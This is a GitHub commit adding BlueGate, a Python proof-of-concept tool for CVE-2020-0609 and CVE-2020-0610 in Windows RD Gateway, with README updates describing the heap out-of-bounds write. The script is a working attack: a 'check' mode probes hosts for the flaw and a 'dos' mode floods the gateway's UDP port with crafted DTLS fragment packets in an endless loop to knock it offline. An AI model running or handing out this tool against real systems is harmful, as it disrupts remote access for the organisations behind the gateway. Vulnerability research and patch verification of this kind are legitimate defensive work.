Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
ollypwn
committed
Jan 24, 2020
1 parent
62416fc
commit 3665147
Showing
10 changed files
with
220 additions
and
13 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,148 @@ | ||
#!/bin/env python3 | ||
from cryptography.hazmat.bindings.openssl.binding import Binding | ||
from OpenSSL import SSL | ||
import argparse | ||
import os | ||
import select | ||
import signal | ||
import socket | ||
import struct | ||
import sys | ||
|
||
TIMEOUT = 3 | ||
|
||
def init_dtls(): | ||
binding = Binding() | ||
binding.init_static_locks() | ||
SSL.Context._methods[0]= getattr(binding.lib, "DTLSv1_client_method") | ||
|
||
def log_info(s): | ||
print(f"\033[96m[*] {s}\033[0m") | ||
|
||
def log_success(s): | ||
print(f"\033[92m[+] {s}\033[0m") | ||
|
||
def log_error(s): | ||
print(f"\033[91m[-] {s}\033[0m") | ||
|
||
class Packet: | ||
def __init__(self, fragment_id = 0, no_of_fragments = 1, fragment_length = 0, fragment = b""): | ||
self.fragment_id = fragment_id | ||
self.no_of_fragments = no_of_fragments | ||
self.fragment_length = fragment_length | ||
self.fragment = fragment | ||
self.pkt_ID = 5 | ||
self.pkt_Len = 0 | ||
|
||
def update_pkt_Len(self): | ||
self.pkt_Len = len(self.fragment) + 6 | ||
|
||
def __bytes__(self): | ||
self.update_pkt_Len() | ||
|
||
buf = b"" | ||
buf += struct.pack("<HHHHH", | ||
self.pkt_ID, | ||
self.pkt_Len, | ||
self.fragment_id, | ||
self.no_of_fragments, | ||
self.fragment_length) | ||
buf += self.fragment | ||
|
||
return buf | ||
|
||
class Connection: | ||
def __init__(self, host = None, port = None, shouldConnect = True): | ||
self.host = host | ||
self.port = port | ||
self.shouldConnect = shouldConnect | ||
|
||
init_dtls() | ||
|
||
signal.signal(signal.SIGALRM, self.broken_connection) | ||
|
||
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | ||
self.connection = SSL.Connection(SSL.Context(0), self.socket) | ||
|
||
if shouldConnect: | ||
self.connect() | ||
|
||
def broken_connection(self, signum, frame): | ||
log_success("Connection not responding") | ||
print(signum, frame) | ||
|
||
try: | ||
self.close() | ||
except: | ||
pass | ||
|
||
sys.exit() | ||
|
||
def connect(self): | ||
signal.alarm(TIMEOUT) | ||
try: | ||
self.connection.connect((self.host, self.port)) | ||
self.connection.do_handshake() | ||
except SSL.SysCallError: | ||
log_error("Could not connect to RD Gateway") | ||
sys.exit() | ||
signal.alarm(0) | ||
|
||
def send_dos_packet(self, id): | ||
packet = Packet( | ||
id, id, 1000, b"\x41"*1000 | ||
) | ||
self.write(bytes(packet)) | ||
|
||
def is_vulnerable(self): | ||
log_info(f"Checking if {self.host} is vulnerable...") | ||
|
||
packet = Packet( | ||
0, 65, 1, b"\x00" | ||
) | ||
|
||
self.write(bytes(packet)) | ||
|
||
ready = select.select([self.socket], [], [], TIMEOUT) | ||
if ready[0]: | ||
buf = self.read(16) | ||
signal.alarm(0) | ||
return not (0x8000ffff == struct.unpack('<L', buf[-4:])[0]) | ||
|
||
return True | ||
|
||
def close(self): | ||
self.connection.shutdown() | ||
|
||
def write(self, buffer): | ||
self.connection.send(buffer) | ||
|
||
def read(self, size): | ||
return self.connection.recv(1024) | ||
|
||
if __name__ == "__main__": | ||
parser = argparse.ArgumentParser() | ||
parser.add_argument("-M", "--mode", choices=["check","dos"], required=True, type=str.lower, default=False, help="Mode") | ||
parser.add_argument("-P","--port", default=3391, help="UDP port of RDG, default: 3391", required=False, type=int) | ||
parser.add_argument("host", help="IP address of host") | ||
|
||
args = parser.parse_args() | ||
|
||
if args.mode == "check": | ||
connection = Connection(args.host, args.port) | ||
is_vulnerable = connection.is_vulnerable() | ||
|
||
if is_vulnerable: | ||
log_success("Host is vulnerable") | ||
else: | ||
log_error("Host is not vulnerable") | ||
|
||
if args.mode == "dos": | ||
log_info(f"Sending DoS packets to {args.host}...") | ||
|
||
i = 0 | ||
while i > -1: | ||
connection = Connection(args.host, args.port) | ||
for n in range(4): | ||
connection.send_dos_packet(i+n) | ||
i += 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,27 +1,59 @@ | ||
# BlueGate | ||
Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. | ||
|
||
# BlueGate | ||
|
||
Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. | ||
|
||
|
||
|
||
These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP. | ||
|
||
|
||
|
||
Please use for research and educational purpose only. | ||
|
||
## Usage | ||
You must have the OpenSSL libraries and headers installed. The default location in the project settings is `C:\Program Files\OpenSSL-Win64`. If you don't have Visual Studio, you should make some minor changes in datatypes and socket initialization. | ||
|
||
|
||
## Usage | ||
Make sure you have [pyOpenSSL](https://www.pyopenssl.org/en/stable/) installed for python3. | ||
|
||
usage: BlueGate.py [-h] -M {check,dos} [-P PORT] host | ||
|
||
positional arguments: | ||
host IP address of host | ||
|
||
optional arguments: | ||
-h, --help show this help message and exit | ||
-M {check,dos}, --mode {check,dos} | ||
Mode | ||
-P PORT, --port PORT UDP port of RDG, default: 3391 | ||
|
||
|
||
|
||
## Vulnerability | ||
|
||
## Vulnerability | ||
The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`. The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session. | ||
The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`. The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session. | ||
|
||
|
||
|
||
If you would like to read more about the vulnerabilities, check [this](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) or read my latest tweets on [Twitter](https://twitter.com/ollypwn) with a PoC video as well. | ||
|
||
## What is RD Gateway? | ||
RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. Inside `Release` you will find an already compiled executable. Note that as soon as the executable is running, it will connect to the server and start sending malicious packets, **so be careful**. | ||
|
||
|
||
## What is RD Gateway? | ||
|
||
.\BlueGate.exe <IP address> | ||
RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. | ||
|
||
## Why BlueGate? | ||
## Why BlueGate? | ||
|
||
|
||
|
||
That was just the working title, and I couldn't come up with a better one at this stage. | ||
|
||
## Todo: | ||
- Vulnerability scanner/checker | ||
- Python implementation | ||
|
||
|
||
## Todo: | ||
|
||
- ~~Vulnerability scanner/checker~~ **DONE** | ||
|
||
- ~~Python implementation~~ **DONE** | ||
|
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
# BlueGate | ||
Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. | ||
|
||
These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP. | ||
|
||
Please use for research and educational purpose only. | ||
|
||
## Usage | ||
You must have the OpenSSL libraries and headers installed. The default location in the project settings is `C:\Program Files\OpenSSL-Win64`. If you don't have Visual Studio, you should make some minor changes in datatypes and socket initialization. | ||
|
||
## Vulnerability | ||
The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`. The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session. | ||
|
||
If you would like to read more about the vulnerabilities, check [this](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) or read my latest tweets on [Twitter](https://twitter.com/ollypwn) with a PoC video as well. | ||
|
||
## What is RD Gateway? | ||
RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. Inside `Release` you will find an already compiled executable. Note that as soon as the executable is running, it will connect to the server and start sending malicious packets, **so be careful**. | ||
|
||
.\BlueGate.exe <IP address> | ||
|
||
## Why BlueGate? | ||
|
||
That was just the working title, and I couldn't come up with a better one at this stage. | ||
|
||
## Todo: | ||
- Vulnerability scanner/checker | ||
- Python implementation |
File renamed without changes.